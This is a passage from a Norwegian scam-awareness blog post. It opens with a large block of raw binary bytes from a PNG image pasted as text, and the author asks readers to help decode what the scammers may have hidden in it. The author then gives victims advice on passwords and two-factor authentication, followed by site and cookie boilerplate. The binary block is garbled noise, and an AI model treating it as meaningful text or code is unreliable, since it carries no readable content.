Пn{7D xID:|t\9}C MsB,}(j.@,^ W 1G}t#/A90L076H#RulKe(
B#YMgne0kYBËm҃\AUU4݁SsU]E,@jn Ya !e!JȠoI:?BCA[0LOK&gt;4U'w~L9
ݴ
Uq;xH%W&gt;\R4nA}_#oxuu~v YeY Ţ@‹-֠0h cʠ\A !nZ=&gt;|&amp;~Sf)aL&amp;Qdž ,XF^1R@ZJ;Β z,ާ)ƭKƕ~XR@Xoyxyo3ɿρ!OFAcU c7 aw/54B9ghbq7ɳK5M 
NDC%”McL\6K
}!X*
k
78dTnDuIyO{'w
aHP&2ׯҡ;کf13t@Gw[[COe#׌.쁖,05N)ڍoԲAΔax8'*{%
9)w1L-afцb;6 GrRF3ӰBqi=|d7˫6٤e/bzSˁ&amp; Ƞy˸
iQaÚʄ.1@7>Kʉw7i8]2;,Xa[:dy:-o֯CWpy ]O"/mC\BKRETK_i6~LhÈTrVA:$qґʈ^DѼ֚ahw[
^3sQRXArRkи-w@ 2z D]
zi)@
F!3j7ld(z=[k^F<Ha’2޿Q9[xo .2siQ’
KM%Xq?5\FBKvp{hhX64uV0g-
TJ6^RfyELmƽehLF{Hc[#:7&lt;G96(JN!:k3@atRM]&lt;꜡
5=NG%Ycm4-A'spj fhTvl !
NLu=\Mq)Xhw"hT=Rw+j=Ŝld!**X%+&amp;
,
c,m ZzE\&lt;rӑи@(%@%7:
w I-O)[!h\Df%SVlۚš;”q] tK1o0V:t4h\/uIeIG6”2e|hŠ gBLp.4[=\hAdah(&n lmn1y&, V 2>
og80taA
jl4pNN9t;”4(4{:IG­9!t= )S,tev7 Z$1Dĉ:};x,4NŊ=<2@=nI?ex}nֹt
}np75q  &PCmqx[Ԡzd]2c?\֜”Y 4N[.j(O%_Au:Az,
啎p\6?KHOA)\}!un]cŇp&amp;4sm^J^]uỏфbC8 g&amp;f~-Ezz#k޹J72Yt:f@7@[.n$Uu0Iֹ54^qc5
24֘
*mw$9S@[8i%FSiM/e;6Y"d̼ tk}g0CV~fh”z9ٚ,;/ۥ@TG<dM
.#KYSߙʶ3nuݮ B¬>4pCiRe!#tI@[4 Mto~g-j(ƴ3iٯxȩއ7't{ᾡp U{+G01Y.|&gt;%3
k9|bf|Hze.y⇨Ґ.’AfKtM\쓥 ;e]dqC&GiɜkG^xF1iЅBH3m-Xی8rc:3T”e֖%ta yi|۷IG迃;di’jKVD?@e?Ğ\iSM{4+4MCY>9~58D fο^ciab{\f2w
Z;y+ռD>8dA^ޔU^2gf-[4IĮ潽< Kf c˄=|LjcNk^2lhFtD]s’G;>jKct3δ-e̡fd|md }2ffݽ>?,9a[Ն{Z,f-;ڑfްeg7fܚC͌5!XҌj’] v¼4k_5’iW2c{//d|}Je_QFмȦJlO54獳N½W68xk;9v
lEJJЋc)?9}u=zi, Oe,4*: 3cKh@
f|}%<U
%Xc˅>P_difؖ-sɯJ7L:CB*v=d{e|1g$iL[ulU cK u)詊d(X&%Z Q-=9!Ink-U}SfZKȽSlzi
;)S=3c-[6t>l3PA^*z)p%Z;OхRЪлof.g~A-ioT<[XݗIá~FQ
GUԽ~ے٧[ukk߇=}CV
I>ܙIENDB`

Der er innholdet gresk, men jeg ser at det har en en png bildefil å gjøre. Hvis scammerne har noe så skjule så vil jeg få det gram i lyset. Klarer du å få noe mere ut av denne koden så bare gi meg tips og jeg oppdaterer artikkelen. Verktøyene jeg har brukt for å dekode er:

https://www.url-encode-decode.com/

https://www.base64decode.org/

Jeg ønsker at mine funn fører til mere kunnskap og igjen så ser du hva dårlig sikkerhet kan føre til. Sikrer du ikke nettsiden din så kan den lett brukes i svindel. Uansett hvor stor den er på internet.  Så har du blitt lurt?

  • Bytt passord
  • Sett på 2 trinns sikring på kontoen din på Facebook
  • Slett alle nye påkoblede enheter

For andre artikler se her, også sjekk ut oss på sosiale medier Facebook og Twitter.

Relatert

Continue Reading

Previous: Svindel – Passordet på Telenor kontoen din må tilbakestill
Next: SVINDEL – Netflix SMS svindel november 2018
  • Om Oss
  • Salgsvilkår
  • Personvernerklæring
  • Tips en venn – Vinn 1 million
Copyright © All rights reserved. | MoreNews by AF themes.
Vi bruker informasjonskapsler for å forbedre din opplevelse, analysere bruk og til markedsføring. Les mer i vår personvernerklæring, og endre innstillinger når som helst.
Personvernerklæring

Your privacy settings

We and our partners use information collected through cookies and similar technologies to improve your experience on our site, analyse how you use it and for marketing purposes. Because we respect your right to privacy, you can choose not to allow some types of cookies. However, blocking some types of cookies may impact your experience of the site and the services we are able to offer. In some cases, data obtained from cookies is shared with third parties for analytics or marketing reasons. You can exercise your right to opt-out of that sharing at any time by disabling cookies.
Personvernerklæring
Allow all

Manage Consent Preferences

Necessary
Always ON
These cookies and scripts are necessary for the website to function and cannot be switched off. Theyare usually only set in response to actions made by you which amount to a request for services, suchas setting your privacy preferences, logging in or filling in forms. You can set your browser to block oralert you about these cookies, but some parts of the site will not then work. These cookies do notstore any personally identifiable information.
Analytics
These cookies and scripts allow us to count visits and traffic sources, so we can measure and improve the performance of our site. They help us know which pages are the most and least popular and see how visitors move around the site. All information these cookies collect is aggregated and therefore anonymous. If you do not allow these cookies and scripts, we will not know when you have visited our site.
Embedded Videos
These cookies and scripts may be set through our site by external video hosting services like YouTube or Vimeo. They may be used to deliver video content on our website. It’s possible for the video provider to build a profile of your interests and show you relevant adverts on this or other websites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies or scripts it is possible that embedded video will not function as expected.
Google Fonts
Google Fonts is a font embedding service library. Google Fonts are stored on Google's CDN. The Google Fonts API is designed to limit the collection, storage, and use of end-user data to only what is needed to serve fonts efficiently. Use of Google Fonts API is unauthenticated. No cookies are sent by website visitors to the Google Fonts API. Requests to the Google Fonts API are made to resource-specific domains, such as fonts.googleapis.com or fonts.gstatic.com. This means your font requests are separate from and don't contain any credentials you send to google.com while using other Google services that are authenticated, such as Gmail.
Marketing
These cookies and scripts may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites. They do not store directly personal information, but are based on uniquely identifying your browser and internet device. If you do not allow these cookies and scripts, you will experience less targeted advertising.
Facebook Advanced Matching
Facebook Advanced Matching can improve ads attribution and conversion tracking. It can help us reach better-targeted custom audiences through our ads. When possible, we will share with Facebook hashed information like your name, phone, email, or address.
Facebook CAPI
Facebook Conversion API Events (CAPI) help us better understand how you interact with our websites. They allow us to measure the impact of our ads on the website's conversions and they improve ads targeting through custom audiences. When possible, we might share with Facebook information like name, email, phone, address.
Confirm my choices Allow all
 

Laster kommentarer...